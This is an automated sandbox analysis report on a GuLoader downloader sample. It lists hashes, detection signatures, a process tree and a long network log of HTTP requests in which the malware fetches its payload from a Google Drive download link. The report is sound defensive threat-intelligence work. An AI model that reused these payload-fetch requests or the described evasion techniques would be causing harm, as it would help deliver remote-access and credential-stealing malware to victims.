Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fbXZ4ErQMU.exe

Overview

General Information

Sample name:fbXZ4ErQMU.exe
Analysis ID:1569258
MD5:c58b26e27e2d9aa8080e289445e1c8ca
SHA1:50dc9a8d9735a94a18cf3b35cb3c88217b3d05cd
SHA256:9201c98d765025cad9fcbe9095c1f34960b641d38c6a4e999720a0c3c129353f
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Switches to a custom stack to bypass stack traces
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • fbXZ4ErQMU.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\fbXZ4ErQMU.exe" MD5: C58B26E27E2D9AA8080E289445E1C8CA)
    • fbXZ4ErQMU.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\fbXZ4ErQMU.exe" MD5: C58B26E27E2D9AA8080E289445E1C8CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-05T17:03:01.276027+010028032702Potentially Bad Traffic192.168.11.2049751142.250.217.238443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: fbXZ4ErQMU.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: fbXZ4ErQMU.exeReversingLabs: Detection: 60%
      Source: fbXZ4ErQMU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49798 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49802 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49811 version: TLS 1.2
      Source: fbXZ4ErQMU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49751 -> 142.250.217.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
